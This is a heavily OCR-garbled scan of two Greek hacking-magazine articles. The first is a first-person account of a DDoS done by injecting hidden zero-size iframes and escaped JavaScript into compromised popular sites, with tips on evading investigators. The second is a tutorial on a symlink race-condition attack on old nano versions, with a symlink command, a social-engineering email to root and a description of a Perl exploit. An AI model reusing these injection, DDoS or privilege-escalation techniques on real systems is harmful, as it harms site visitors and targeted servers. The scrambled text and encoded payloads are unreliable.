Νομίζω от! тора αντιλαμβάνεστε στο σκεπτικὀ µου! Н ομάδα WHITE ἐχει 
опо τον ἐλεγχὸ της αρκετά δηµοφιλἠ sites, µε υψηλή επισκεψιμότητα. 
Επομένως, yia va ρίξω ro site της ναυτιλιακής да έπρεπε να στρέψω 
μερικὰ апо ra zombie της ομάδας στον server του www.victim.gr. Τώρα, 
εἶναι πιθανό να αναρωτιέστε για ro noc да πετύχαινα κάτι τέτοιο. Н λύση 
εἶναι πολύ απλἠ. Εφόσον εἶχα τον ἐλεγχο των server, αρκούσε va τρο- 
ποποιήσω τον κὠδικα HTML των αντἰστοιχων σελίδων και να προσθέσω 
кат! τέτοιο: 


<IFRAME SRC-"http://www.victim.gr" WIDTH-0 ΗΕΙάΗΤΞΘ 
frameborder-z0»«/IFRAME» 


О παραπάνω κὠδικας δημιουργεἰ va iframe, µε ra περιεχόμενα του 
www.victim.gr. Βέβαια о! διαστάσεις του iframe εἶναι μηδενικὲς. Έτσι, о 


v €] (> сообе а] 


Εικόνα 2 
Κάνοντας ἑνα 
reverse IP 

lookup апо ro 
domaintools, βλέ- 
πουµε αμέσως ОТ! 
о Server του WWW. 
victim.gr φιλο- 
ξενεί dAAa 1863 
domains! Κλασική 
περίπτωση shared 
hosting... 
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επισκέπτης του πειραγμένου site δεν θα αντιληφθεί τίποτα, ενώ την ἰδια 
στιγμή, о server rou site θα συνδεθεί στο www.victim.gr και θα ζητήσει 
την αρχικἡ σελἰδα. То како µε αυτή τη λύση, έχει να κάνει pie Tou χρήστες 
που γνωρἰζουν HTML και τους αρέσει να μελετούν nog εἶναι στημένα 
τα διάφορα sites. Ένας τέτοιος χρήστης εἶναι πολύ εὐκολο να εντοπἱσει 
το ύπουλο iframe, κάνοντας va απλὀ view code апо τον web browser. 
Ὅπως αντιλαμβάνεστε, n παρουσἱα ενὸς τέτοιου iframe да προβλημάτιζε 
τον περἱεργο φίλο µας, ο οποίος στη συνέχεια да ¿kave διάφορες ενοχλη- 
TIKÉG ερωτήσεις στους διαχειριστὲς ἡ και σε διάφορα φόρουμ. Φυσικά, 
εγὠ δεν ἠθελα va συμβεἰ τίποτα апо ола αυτά. Па να ξεπεράσω auró 
το πρόβλημα, λοιπὀν, χρησιμοποίησα ἑνα колпак! WOTE ο κὠδικας του 
iframe να µη βγάζει μάτι! Συγκεκριµένα, μετέτρεψα τον κὠδικα σε AKO- 
λυθἰα escaped characters ка! rov φύτεψα σε κἀθε site ре тп βοήθεια ενὸς 
μικροῦ script σε JavaScript. To script εἰχε ως εξἠς: 


«script language-"javascript'» 

document.write( unescape( '%3С%49%46%52%41%40%45%20 

265 3265 2264 3263D762 27668767 4267 4267 0263762 F762 F267 7267 7267 7262 E767 32633266 3267 5 

767 22665262 E266 7767 2762. 2762 0765 7264926441265 4764.8763D763 0262 0264 8264.5 764.9764 776488 - 
2654263D763076207566757 2766 1766D766 5266 2766 F 767 27664266 5267 2263D7630763 E763 C762 F 264.976 
46%52%41%4D%45%3E%0A%0A%09%09%09') ) ; 


</script> 


О παραπάνω κὠδικας εἶναι σίγουρα παράξενος, αλλά δεν θα κινήσει 
τόσες υποψίες, ὅσες éva iframe μηδενικού μεγέθους! Μάλιστα, για να 
τον κάνω πιο αποτελεσματικὀ (πιο επιβλαβή για то www.victim.gr) του 
προσέθεσα και évav микро βρὀχο. Αυτός ο βρὀχος δημιουργούσε δέκα 
iframes σαν αυτὀ που σας ἐδειξα παραπάνω και, τουλάχιστον θεωρητικά, 
θα δεκαπλασἰαζε τη ζημιά. Βέβαια στην πράξη οι web browsers ¿xouv то 
caching ενεργοποημένο και δεν επισκέπτονται τόσο συχνὰ ἑναν server, 
όταν δέχονται то ἰδιο URL. Ωστόσο η αλλαγἠ στον κὠδικα δεν µου κὀ- 
στισε τίποτα, ενώ δεν αποκλείεται να µε βοηθούσε κιόλας. О τελικὸς 
κώδικας που χρησιμοποίησα φαίνεται παρακάτω: 


«script language-"javascript'» 
Фог(1=1; 1<=10; i++) 
document.write( unescape( 
"163 C2649764 6765 22641764 D 764.5262 0765 3765 2264 3763D762 2766 876 7 4767 4767 076 
3A62F762 F 267 7267 7767 7262 E767 3763 3266 3767 5767 2266 5762 E266 7767 276222620 
265 776492644765 4764 8263D763 07620764 8764.5 2649764 77648265 4763D76 30762 0766 6767 2766 1766D76 
657662756 F 767 276647665767 2763D7630763 E763C762 F764.9264.6765 27641764 764.5763 E260 A76 
@А%09%09%09")) ; 
</script> 


Πριν φυτέψω rov κὠδικά µου στα φαγωμένα sites, ἑκανα μερικὲς δοκιμές 
σε дико µας server. О εν λὀγω server τρέχει IIS κι ο client nou χρησιμο- 
ποιοὐσα ἦταν o Internet Explorer 9. Στην εικόνα 3 μπορείτε va δείτε µια 
δεκάδα κλήσεων nou праунатопой@пкау προς то server, όταν επισκὲ- 
φθηκα ro site µε τον ύπουλο κὠδικα. Φυσικά, η ἰδια δεκάδα κλήσεων Ep- 
Φανιζόταν και κάθε φορά που συνδεόταν κάποιος άλλος στο πειραγμένο 
site ἡ όταν ¿kava refresh. Παρεμπιπτόντως, αξίζει να σας πω éva ακόμα 
κολπάκι, αν kai φοβάμαι от! µπορεί va µε προδώσει και το αποφεύγω. 
Πολλοὶ hackers, λοιπὸν, όταν φυτεύουν κὠδικα σαν αυτόν που σας ἐδειξα 
παραπάνω, βάζουν στο HEADER της σελἰδας και την ακόλουθη εντολή: 


«meta http-equiv-'refresh" content="10"> 


DDoS για то δικό σας калб! 
ML 


l 
απ ο ο | 


File Options Process View Help 


55. exech44 TCP lantop: 
Με αυτόν rov тропо, η ióia η σελίδα ωθεὶ rov browser να κάνει refresh 
avà 10 δευτερόλεπτα. Όπως αντιλαμβάνεστε, auró εἶναι πολύ кало για 
TO окопо µας, αλλά ἐχει και μερικές ἀσχημες παρενέργειες. Καταρχάς, o 
επισκέπτης του site εἶναι πιθανὀ να παρατηρήσει от! ο browser φορτώ- 
νει κάθε Муо και λιγάκι, ακόµα κι όταν δεν да έπρεπε. Επιπρόσθετα, σε 
διάφορους browsers (όπως στον IE), µετά апо κάθε refresh ο χρήστης 
τοποθετείται στην архй της σελίδας ка! ОХ! εκεἰ που βρισκόταν. AUTÒ 
εἶναι πολὺ како yia ἑνα μηχάνημα zombie, αφού ενδέχεται va θορυβήσει 
το χρήστη! 


Συμπεράσματα 


Μετὰ апо την αναλυτικἠ περιγραφὴ ὁσων kava, νομίζω ὁτι αξίζει να 
συνοψίσω ορισμένα σημεία ενδιαφἐροντος: 


ο О επιτιθἐµενος μπορεἰ να βρει τεχνικές πληροφορίες για ёха site, 
χωρὶς va кам οὐτε va ping (βλέπε domaintools). 

ο Κρίσιμες πληροφορίες ενδέχεται va διαρρεύσουν και απὀ τον ἰδιο 
τον διαχειριστή, αν κάνει το λάθος να χρησιμοποιεί то email του 
(ἡ οποιοδήποτε ἄλλο προσωπικὀ του στοιχείο) στα forum απ΄ ónou 
αναζητά λύσεις για τα προβλήματα του. 


ο Μερικὲς φορὲς, η πηγἠ µιας επίθεσης DDoS εἶναι δύσκολο να εντο- 
пісті. Арк= να φαίνεται от! η επίθεση πραγματοποιείται апо µη- 
χανήματα υπεράνω πάσης υποψίας (για παράδειγµα, апо τις IP των 
in.gr, yahoo.gr к.о.к.). 

ο Όποια εταιρεία ασφάλειας αναλάβει τον διερεύνηση της επίθεσης 
(τη µελέτη των logs του θύματος), да δει μόνο µια μεγάλη αὐξηση 
της κίνησης апо διευθύνσεις "νομοταγών” μηχανημάτων. Κανένας 
δεν проката! να δει κάποια απὀ τις δικὲς µας διευθύνσεις ТР. Ταυ- 
τὀχρονα, τα διάφορα Ροϊάκια που κυκλοφορούν στο Διαδίκτυο £i- 
ναι πολὺ πιθανὀ να ¿xouv σκανάρει αρκετὲς φορὲς τον server του 
θύματος, μπερδεύοντας ακόμα περισσότερο την ónoia διερεύνηση! 


[...] 


Αυτἠ η αναφορά yia την δράση της ομάδας WHITE µας ενθουσἰασε. Όχι 
τόσο για το περιεχὀμενὸ της, ὁσο για το γεγονὸς от! εφόσον τη λάβαμε, 
ο ἄνθρωπος µας εἶναι ασφαλἠς. Όλα πήγαν кала, ο κίνδυνος απομακρύν- 
θηκε κι ο практорас µας κυκλοφορεἰ ασφαλἠς. Μείνετε συντονισμένοι... 


{ΠΕ 
Process ғ Protacol Local Address Remote Address State 
| ΚΩ Fa anm 22 ΤΟΝ “σωμα 
MED at DA -- - 101 go le UT Я А а 
| Mu t 2 --- Ш 3L EE ume zT EE 
| Е FAP 35 


LISTENING 


Εικόνα 3 

О IE9 επισκέπτεται 
αρκετές φορές την 
IP rou θύματος, 
χωρίς va αντιλη- 
φθεί τίποτα o xph- 
στης. Τώρα, αν το 
site µε τον ύπουλο 
κώδικα δεχτεί πολ- 
ЛЕС επισκέψεις, ο 
στόχος µας θα δε- 
χτεί πολλαπλάσιες 
και κάποια στιγμή 
θα γονατίσει! 


Sk111: Intermediate 


Tags: symbolic 
links, symlinks, 
расе condition, Perl 


Αν βρεθεῖ ο κατάλληλος ἄνθρωπος την 
κατάλληλη στιγμή, μπορεἰ να µας σώσει 
апо οτιδήποτε. Αν ωστόσο δημιουργηθεἰ 
το κατάλληλο symbolic link την κατάλληλη 
Χρονική στιγµή, µπορεί και να καταστραφούμε. 
Δεν ξέρουμε αν γνωρίζετε τι εἶναι τα 
symbolic links, αλλά πρέπει να σας πούμε 
ότι δημιουργούνται πανεύκολα κι апо 
οποιονδήποτε χρήστη ενός υΝΙΧοειδούς 
λειτουργικού. Ένας επἰδοξος attacker εἶναι σε 
θέση va εκμεταλλευτεῖ ra symbolic links yia 
να πετύχει το στόχο του, ευτυχώς ὁμωςπου 
χρειάζεται το κατάλληλο timing το οποίο εἶναι 
δύσκολο va επιτευχθεῖ. ‘Н μήπως ὀχι; 


ΕΠΙΚίΙΝΔΥΝΕΣ 


ΔΙΑΣΥΝΔΕΣΕΙΣ, 
αλλά συμβολικα! 
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Σε αυτό το άρθρο θα ασχοληθούμε ue TIG επιθέσεις συμβολικὠν συνδέσε- 
ων (symbolic links ἡ symlinks). Επιπρόσθετα, θα μιλήσουμε για τις επιθὲ- 
σεις race condition και θα εξηγήσουμε γιατί εἶναι εξαιρετικἁ δύσκολο να 
πετύχουν. Φυσικά, yia να αποκτήσουμε µια πλήρη εικόνα του θέματος, 
δεν θα περιοριστούμε στη θεωρία: Θα εξετάσουμε αυτὲς τις επιθέσεις 
στην πράξη, γράφοντας κι αναλύοντας ἑνα προγραμματάκι σε Реп. Το 
προγραμματάκι µας θα εκμεταλλεύεται την αδυναμία ενὸς ἄλλου προ- 
γράμματος, το οποίο συνοδεύει σχεδὸν ὁλες τις διανομές Linux. О λόγος 
γίνεται για το nano. О εν λόγω text editor, ἑως και την ἐκδοση 2.2.3 
διέθετε ша κρίσιμη αδυναμία σε σχέση µε το χειρισμό των symbolic link. 
Βέβαια, οι περισσότερες διανομὲς Мпих προσφέρουν πλέον τη διορθω- 
μένη ἐκδοση rou nano, εἶτε апо την εγκατάσταση eire μέσω ενημερώ- 
σεων. Ωστόσο η επίθεση nou θα εξετάσουμε ἐχει µεγάλη διδακτικἠ αξία: 
Αποτελεἰ ἑνα ἀριστο παράδειγµα ανατρεπτικἠς και ευφυέστατης σκέψης! 


Συμβολικὲς συνδέσεις 


Ασχοληθήκατε ποτὲ µε δείκτες στη C ἡ σε κἀποια ἄλλη γλὠσσα; Έχετε 
παΐξει ποτὲ µε δείκτες προς δείκτες; Ξέρετε апо double linked lists και 
B-trees; Αν ὀχι, µην τρομάζετε: Δεν σκοπεύουµε να σας φλομώσουμε στη 
θεωρία. Μιλώντας апла, οι συμβολικἐς συνδέσεις αποτελούν δείκτες προς 
алла αρχεία. Μπερδευτήκατε; Μήπως νομίζετε от! μιλάμε για κἀποιου εἰ- 
δους αρχεία, τα οποία μοιάζουν µε та shortcuts των Windows; Όχι! Та 
symbolic links δεν ἐχουν καμία σχέση µε ra shortcuts των Windows. Acsi- 
ТЕ το ακόλουθο παράδειγµα ка! θα καταλάβετε τα πάντα: 


ln -s »/ΠΥ scripts/update test 


Στα συστήματα Unix/Linux μπορούμε va κατασκευάζουµε συμβολικὲς 
συνδέσεις µε το προγραμματάκι In. Με την παραπάνω γραμμὴ, λοιπὀν, 
δημιουργούμε ёха symbolic link προς το αρχείο «/my. scripts/update. 
Αυτἠ n συμβολικἠ σύνδεση θα ονομάζεται test και θα εμφανίζεται ως ἑνα 
αρχείο µέσα στον κατάλογο апо rov onoio δώσαμε την εντολή. Τώρα, 
αν προσπαθήσουμε να εκτελέσουµε το test, θα εκτελεστεὶ το σκριπτάκι 
ονόματι update. Αναμενόμενο, θα σκεφτεἰτε. Προσέξτε ὀµως αυτό: Αν 
χρησιμοποιήσουμε το προγραμματάκι cat µε το αρχεἰο test (cat test) да 
εμφανιστούν τα περιεχόμενα του update. Με άλλα λόγια, ro test μοιά- 
ζει v' αποτελεἰ ἑνα αντίγραφο του script. Αναρωτιέστε γιατὶ λέμε от 
μοιάζει” µε αντίγραφο; Πολύ апла, γιατὶ δεν εἶναι! Av σβήσουμε то ~/ 
my. scripts/update, ro test θα πάψει να λειτουργεί. Υπάρχει µια ακόµα 
απὀδειξη yia το от! οι συμβολικὲς συνδέσεις δεν αποτελούν αντίγραφα 
αρχείων. Αν δημιουργήσουμε εκατὀ (vai, 100) συμβολικὲς συνδέσεις ενὸς 
μεγάλου αρχείου (π.χ., ενὸς βίντεο), θα παρατηρήσουμε от! ο ελεύθερος 
χώρος του δίσκου µας δεν θα επηρεαστεἰ καθόλου! Βλέπετε, ша συµβο- 
λικἡ σύνδεση αποτελεί δείκτη просто жӧуора* του πρωτότυπου αρχείου. 
Θα μπορούσαμε να πούμε, λοιπὀν, от! οι συμβολικές συνδέσεις αποτε- 
λούν shortcuts, τα οποία ωστόσο δημιουργούνται σε χαμηλὸ επἰπεδο (και 
συγκεκριµένα στο επίπεδο του συστήματος αρχείων). 


Κάπου εδὠ σας προτείνουμε va πειραματιστεἰτε και μόνοι σας. Μπορείτε 
να δημιουργήσετε διάφορες συμβολικὲς συνδέσεις, προς διάφορα αρχεία, 
va μελετήσετε τη συμπεριφορά τους και να εξετάσετε τις επιπτώσεις στο 
χώρο του δίσκου. Εἰμαστε σίγουροι от! θα σκεφτείτε πολλὲς ενδιαφἑἐρου- 
σες εφαρμογές για τις συμβολικὲς συνδέσεις. Εμεἰς πάντως θα παρουσι- 
ἆσουμε µια μᾶλλον επικίνδυνη εφαρμογἠ τους. Н ενδιαφἐρουσα και pal- 
νομενικὰ αθώα ἐννοια των συμβολικὼν συνδέσεων μπορεί να οδηγήσει 
σε μεγάλες καταστροφές! 


Επικίνδυνες διασυνδέσεις,αλλά συμβολικά! 
ИИ 


Που εἰν' то како, βρε παιδιά; 


Πολλά προγράμματα δημιουργούν διάφορα προσωρινά αρχεἰα, ката την 
εκτἑλεσἠ τους. Ωστόσο σχεδὸν κανέναν δεν ελἐγχει αν то προσωρινὀ 
αρχείο, στο οποίο προσπαθεί να γράψει, προὐπάρχει ἡ ὀχι. Το ygyovóg 
αυτὸ апо μόνο του δεν αποτελεἰ μεγάλο πρόβλημα. Οι πραγματικοί pne- 
λάδες προκύπτουν órav ἑνα πρόγραµµα ακολουθεί στα τυφλὰ --ҳоріс να 
πραγματοποιεἰ κανέναν ἐλεγχο-- συμβολικὲς συνδέσεις. Ένα τέτοιο npó- 
уранна θα μπορούσε να καταλήξει να γράφει σ' ёха κρίσιμο αρχείο του 
συστήματος και μάλιστα µε τα δικαιώµατα εκείνου που το ἐτρεξε. Nopi- 
ζουμε от! μπορείτε να καταλάβετε γιατὶ εἶναι како кат! τέτοιο. Μάλιστα, о 
κίνδυνος πολλαπλασιάζεται ὀταν ro проуранна εκτελεῖται µε δικαιώματα 
root! Ένας επιτιθέμενος που εκμεταλλεύεται την εν λόγω αδυναμία θα 
μπορούσε σχετικἁ εὐκολα να πετύχει τα ακὀλουθα: 


ο Να αποκτήσει δικαιώματα διαχειριστή (privilege escalation) 


ο Να γράψει σε αρχεία, στα οποία δεν έχει πρὀσβαση υπό φυσιολο- 
γικὲς συνθήκες 


ο № αποκτήσει τον πλήρη ἐλεγχο (την ιδιοκτησία) ξένων αρχείων 


Ζήτημα συγχρονισμού 


Υπάρχουν πολλά προγράμματα, апо απλά σκριπτάκια μέχρι σύνθετες 
υπηρεσίες, τα οποία δεν εκτελούνται διαρκώς µε δικαιώματα διαχειριστή. 
Ta προγράμματα αυτού του εἰδους ξεκινούν µε περιορισμένη δικαιοδοσἰα 
και ολοκληρώνουν кад= εργασία που απαιτεἰ τα δικαιώματα ενὸς απλού 
χρήστη. Στη συνέχεια αποκτούν τα δικαιώματα του διαχειριστή, ολοκλη- 
ρώνουν τις εργασἰες που προὐποθέτουν πλήρη πρὀσβαση στο σύστημα 
κι αµέσως μετὰ απαρνούνται την εξουσία και περιορἰζονται πάλι στα δι- 
καιώματα ενὸς απλού χρήστη. Αυτή n "δουλική" συμπεριφορά των npo- 
γραμμάτων αυξάνει αρκετά την ασφάλεια ενὸς συστήµατος, αλλά δεν то 
κάνει атрото. Ας δούμε va παράδειγµα: Φανταστεὶτε ἑνα πρόγραμμα για 
την αυτόματη εκκαθάριση ορισμένων καταλόγων του συστήματος. Ἕνα 
τέτοιο πρόγραµµα θα μπορούσε αρχικά να καταρτίζει µια λίστα µε ола τα 
προς διαγραφὴ αρχεία. Ακολούθως, Ва διέγραφε όλα όσα μπορούσε µε та 
δικαιώματα του απλού χρήστη, ενώ yia να σβήσει τα υπόλοιπα θα απο- 
κτούσε για ελάχιστο χρόνο δικαιώματα root. Απέναντι о" ἑνα проуранра 
μ' αυτή τη συμπεριφορά, η δουλειά του επιτιθέµενου εἶναι ιδιαίτερα δύ- 
σκολη. О wanna-be-root θα έπρεπε να εκμεταλλευτεἰ κάποια αδυναμία 
του προγράμματος, ακριβώς τη στιγµἠ που αποκτά αυξημένα προνόμια 
και πριν τα απαρνηθεἰ. Με Aiya λόγια, το ενδεχόμενο επιτυχίας µιας επἰθε- 
σης ανάγεται σε ζήτημα σωστού timing! Ακριβώς γι’ αυτό, οι επιθέσεις σε 
προγράμματα που παρουσιάζουν τέτοια συμπεριφορά χαρακτηρἰζονται 
ως race condition attacks. 


Επικίνδυνη απροσεξία 


Μετά апо τόση θεωρία, πιστεύουμε от! πρέπει να περάσουμε στη δράση. 
Καταρχάς, να υπογραμμίσουμε ὁτι για να εκτελεστεί µια επίθεση μέσω 
συμβολικὠν συνδέσεων, ο επιτιθέμενος πρέπει va ἐχει αποκτήσει npó- 
σβαση στη γραμμὴ εντολών του συστήματος. Ας υποθέσουμε, λοιπὀν, 
от! ¿vac δολιοφθορέας ἐχει καταφέρει να αποκτήσει ΤΟ username ка! TO 
password ενός απλού χρήστη. (Σ.τ.Ε. Ἡ μπορεί να έχει νόμιμα κάποιον 
λογαριασμὀ εκεἰ алла να θέλει και πρόσβαση στο λογαριασμό rou root.) 
Тора που ἐχει πρὀσβαση στο σύστημα, τον απασχολεἰ το пос да αποκτή- 
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cei πρὀσβαση σε διάφορα αρχεία του συστήµατος, µε okonó va Ta ξεπα- 
στρέψει και να προξενήσει τη μέγιστη δυνατἠ καταστροφή. Ας δούµε πὼς 
μπορεί να πετύχει кат! τέτοιο. 


Όπως εἰπαμε στην εισαγωγή, η επίθεση που θα εξετάσουμε στηρἰζεται σε 
µια αδυναμία του nano. Το εν λὀγω πρόγραµµα προσφἑρει τη λειτουργία 
του αυτόματου backup ката την επεξεργασἰα ενὸς κειµένου. Εν ολίγοις, 
κάθε φορά που ανοίγουμε ἑνα αρχείο, το τροποποιούμε και στη συνέχεια 
το αποθηκεύουµε, то nano αποθηκεύει κι ἑνα αντίγραφο. Το αντίγραφο 
Παΐρνει το ὀνομα του πρωτότυπου αρχείου, αλλά στο τέλος TOU ἐχει κι 
£vav χαρακτήρα tilde (~). Едо πρέπει να πούμε ὁτι το backup δημιουργεἰ- 
ται στον 1910 κατάλογο µε ro πρωτότυπο арх=!0, =ктос κι αν έχουμε орісі 
κάποιον ειδικό κατάλογο апо το αρχείο ρυθμίσεων rou nano. Βέβαια, κάτι 
τέτοιο συμβαίνει поло σπάνια. Αντίθετα, η λειτουργία των backup εἶναι 
πολὺ συχνά ενεργοποιημένη!. 


Ας εξετάσουμε τώρα, τι ακριβώς κάνει το nano όταν αποθηκεύουµε va 
αρχεἰο και µε την προὐπόθεση Ori εἶναι ενεργοποιημένα ra backup: 


1. Αρχικά δηµιουργεἰ va αρχείο µε το ἰδιο ὀνομα, αλλά στο τέλος 
προσθέτει ἑνα ~. 


2. Ανοίγει το αρχεἰο backup και γράφει τα περιεχόμενα του nporó- 
τυπου αρχείου. 


3. Με τη βοήθεια της συνάρτησης chmod(), το nano αλλάζει τα δια- 
карата rou backup, ώστε va εἰναι ióia µε εκείνα του прототи- 
που αρχείου. 


4. Με τη βοήθεια της συνάρτησης εΠοννη(),το backup αποκτά τον 1010 
ιδιοκτήτη µε εκεἰνον του προς επεξεργασία αρχείου. 


Μετὰ ακολουθούν κι ἄλλες ενέργειες, οι οποίες ωστόσο δεν µας απασχο- 
λούν. Н ευπάθεια βρίσκεται στα βήματα nou περιγρἀψαµε. ПаратпрйотеЕ, 
λοιπὸν, от! στο прото βήμα ro nano δεν ελέγχει αν υπήρχε ἠδη ro ap- 
χεἰο backup. Επιπρόσθετα, στα επόμενα rpia βήματα ro nano δεν ελέγχει 
αν то backup апот=Л=! φυσιολογικὀ αρχείο ἡ av проката! για κάποιο 
symbolic link. Το πρόγραµµα праунатопо!=! τις εργασἰες του χωρἰς va 
επαληθεύσει τη φύση rou backup και χωρὶς να βεβαιωθεἰ оті проката! 
yia ἑνα απλὀ αρχείο. Moipaio λάθος! 


Μετὰ апо оса εἶπαμε για τη συμπεριφορά του nano, μπορούμε va επι- 
στρέψουµε στο παράδειγμά µας. О επιτιθέμενος γνωρίζει τη συγκεκρι- 
μένη αδυναμία rou nano κι αποφασίζει να την εκμεταλλευτεί. Έτσι, δη- 
μιουργεὶ στα γρήγορα ἑνα αρχείο απλού κειμένου και προσθέτει μερικὲς 
φαινομενικὰ χρήσιμες σημειώσεις. AUTÒ το κάνει δίνοντας кат! τέτοιο: 


cat » my notes 
1. Blah, blah... 
2. Blah, blah... 
3; 


Στο τέλος, για va αποθηκευτούν ὁσα ἐχει πληκτρολογήσει, δίνει ἑνα 
[Ctrl+D]. Κατόπιν εκτελεί το ακόλουθο: 


1. Еду η λειτουργία των backup εἶναι απενεργοποιηµένη στο δικὀ σας σύστημα, θα πρέπει να την ενεργοποι- 
ἠσετε yia va αναπαραγάγετε την επίθεση που παρουσιάζουμε. Па το σκοπὀ αυτό, арк να ανοίξετε το /etc/ 
nanorc, να εντοπίσετε τη γραμμή #set backup και va την ενεργοποιήσετε, αφαιρώντας το χαρακτήρα # от" 
αριστερά. 


Επικίνδυνες διασυνδέσεις,αλλά συμβολικά! 
ПИ 


ln -s /var/root-file my notes- 


МЕ auróv rov τρόπο, o πονηρὸς επιτιθέμενος δημιουργεἰ va symbolic 
link προς то арх /var/root-file και του δίνει то 1610 ακριβώς буора που 
θα ἐδινε ro nano στο backup rou my. notes. Τώρα, αυτό που χρειάζεται 
εἶναι να τρέξει κἄποιος ro nano µε δικαιώματα root και να ανοίξει το ту_ 
notes. Ποιος ἄλλος θα μπορούσε να κάνει ευκολότερα кат! τέτοιο, πέρα 
ano τον ἰδιο τον root; Σε αυτό το στάδιο, λοιπὸν, о επιτιθέμενος επιστρα- 
τεύει ὁλες τις δεξιὀτητὲς του στην κοινωνικὴ μηχανική. Ἔτσι, στέλνει ἑνα 
email στο διαχειριστή, στο οποίο γράφει кат! τέτοιο: 


Καλημέρα. Έχω va μικρὀ προβληματάκι µε ёха αρχείο plain text, στον 
τάδε κατάλογο. Evo έχω πλήρη δικαιώματα πρὀσβασης, δεν рпоро va то 
τροποποιήσω! To nano βγάζει ἑνα μήνυμα λάθους και δεν µου επιτρέπει 
να κάνω save. Μπορεὶς va του ρἰξεις ша ната; Ευχαριστώ προκαταβο- 
Ака! 


Με ἑνα τέτοιο μήνυμα, о калос και φιλότιμος root δεν θα αρνηθεἰ va Bon- 
θήσει. Ωστόσο, όταν ανοίξει το αρχείο µε то nano θα πέσει σε µια μεγάλη 
παγίδα! Τη στιγμὴ που θα δοκιμάσει να σώσει το αρχείο, ro nano да ano- 
θηκεύσει τα περιεχόμενα rou my. notes στο ἴδιο το αρχείο αλλά και στο 
backup του. Όμως ro backup αποτελεἰ ἑνα symlink για то /var/root-file. 
Επομένως, ro nano θα καταλήξει να γράψει τα περιεχόμενα του my. notes 
στο root-file! Επιπρόσθετα, το катастрофика απρὀσεκτο nano да тро- 
ποποιήσει και τα δικαιώματα του root-file. Συγκεκριµένα, θα та αλλάξει 
QOTE να ταυτἰζονται µε εκείνα του my. notes. Έτσι, ο επιτιθέμενος θα 
αποκτήσει απεριόριστη πρὀσβαση σ' ἑνα "απαγορευμένο" αρχείο. Όπως 
αντιλαμβάνεστε, µε τον 1010 τρόπο πάντα, о επιτιθέμενος θα μπορούσε 
να καταστρέψει και να αποκτήσει πλήρη πρὀσβαση σε οποιοδήποτε ар- 
ХЕ του συστήματος. Σκεφτεἰτε τι θα γινόταν αν ἑστηνε αυτή την παγίδα 
γύρω апо το αρχείο /etc/passwd. Θα μπορούσε να εισαγάγει τους δικούς 
του χρήστες, µε γνωστά πάντα password, ὁπως επἰσης να αλλάξει το 
συνθηματικὀ του root. Όταν θα γινόταν αντιληπτή αυτή η επἐµβαση, θα 
ἠταν поло αργά. О επιτιθέμενος θα εἰχε καταλάβει πλήρως το σύστημα! 


Ὄχι, δεν µας ξέφυγε ;) 


Ξέρουμε τι σκεφτόσαστε! Ἑνας στοιχειωδώς προσεκτικὀς root, δεν θα 
ἄνοιγε ποτὲ va αρχείο χωρὶς να ρίξει µια ната τριγύρω. Στην απλού- 
στερη των περιπτώσεων θα ἐδινε éva Is -Ih, για να δει το μέγεθος ка! та 
δικαιώματα του αρχείου. Ακριβώς τότε, όμως, θα έβλεπε ка! το ύποπτο 
symbolic link. Προφανώς, η ιδέα και µόνο от! του την ¿xouv στημένη θα 
τον εξαγρἰωνε. Н επόµενη κἰνησὴ rou θα ἦταν να σβήσει το symbolic link 
και μετὰ να κλειδώσει то λογαριασμὀ του поупрой χρήστη, μέχρι να ξε- 
καθαρίσει η κατάσταση. Με Муа λόγια, η επίθεση θα εἶχε αποτύχει. Τι θα 
έπρεπε να εἰχε κάνει о επιτιθέμενος, για να πετύχει το σκοπὀ TOU; 


Ας πάρουμε τα πράγματα µε τη сара. Το symbolic link προς то anayo- 
ρευμένο αρχείο του συστήματος εἶναι απαραίτητο για να πετύχει η eni- 
θεση. Όμως, η παρουσία rou ξεσκεπάζει τον επιτιθἐµενο. Επομένως, то 
ζητούμενο εἶναι va εξασφαλἰσουµε от! о root *ógv* θα δει το symlink. 
Μπορεὶ να γίνει кат! τέτοιο; Φυσικὰ ка! ὀχι. О μόνος τρόπος yia va *unv* 
δει ἑνα αρχείο o root, τουλάχιστον σ' ἑνα υγιές σύστημα, εἶναι va *unv* 
υπάρχει το αρχείο. E, λοιπὸν, αυτή εἶναι kai η λύση! О επιτιθέμενος δεν θα 
έπρεπε va δημιουργήσει το symbolic link εξαρχἠς. Αντίθετα, θα έπρεπε να 
φροντἰσει ὥστε το symlink να δημιουργηθεί τη στιγµή nou ο root avoi- 
γει TO my. notes και πριν το αποθηκεύσει. Αναγνωρίζετε τη φύση αυτού 
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του προβλήματος; Πρόκειται για µια περίπτωση racing condition. Όμως, 
κάπου εδὠ προκύπτει ἑνα νέο πρὀβλημα: Πώς γνωρίζει ο εισβολέας την 
ακριβἠ χρονική στιγμή, ката την onoia θα ανοίξει το αρχείο o root; To 
symbolic link θα πρέπει να δημιουργηθεί *арёсос̧* μόλις ανοιχτεἰ το ap- 
ХЕо, καθώς ο root ενδέχεται να το αποθηκεύσει και να το κλείσει εντὸς 
ελάχιστων δευτερολέπτων. Όπως αντιλαμβάνεστε, αυτή τη δουλειά θα 
μπορούσε va την κάνει πανεύκολα £va script, το οποίο εκτελείται στο 
υπόβαθρο. Στη συνέχεια παραθέτουμε µια δικἠ µας υλοποίηση, γραμμένη 
σε Perl (κατεβάστε το αρχείο kai апо το http://bit.ly/dhO10nanopl): 


Επικίνδυνες διασυνδέσεις,αλλά συμβολικά! 
| 


Ανάλυση... 


To проуранра δέχεται δύο παραμέτρους: Н πρώτη αποτελεἰ το буора του 
αρχείου text που θα χρησιμοποιηθεί σαν δόλωμα, ενώ η δεύτερη δηλώνει 
τον κατάλογο στον οποίο θα τοποθετηθεἰ το δόλωμα. Ας δούμε nog λει- 
τουργεὶ το проуранна: 


Γραμμές 1-7: Γίνεται ἐλεγχος για το πλῆθος των παραμέτρων. 
Αν δεν εἶναι δύο, το проуранна τυπώνει va σύντομο παράδειγµα 
χρήσης και τερματίζει. Αν οι παράμετροι εἶναι ὀντως δύο, καταχω- 
ρούνται στις μεταβλητές $file ка! $path. 


Γραμμές 9-12: Ελἐγχεται αν το αρχείο που καταχωρήθηκε στη pE- 
ταβλητὴ $file υπάρχει ἠδη ἡ ὀχι. Στη δεύτερη περίπτωση, ro npó- 
уранна τερματίζει. 


Γραμμές 15-20: Το πρὀγραμμα τσεκάρει την ἐκδοση του nano. Av 
η εγκατεστημένη ἐκδοση εἶναι νεότερη της 2.2.3, то πρὀγραμμα 
τερματίζει τυπώνοντας το αντἰστοιχο μήνυμα. 


Γραμμή 24: Εδὼ ξεκινὰ ο κύριος βρόχος του προγράμματος. Н 
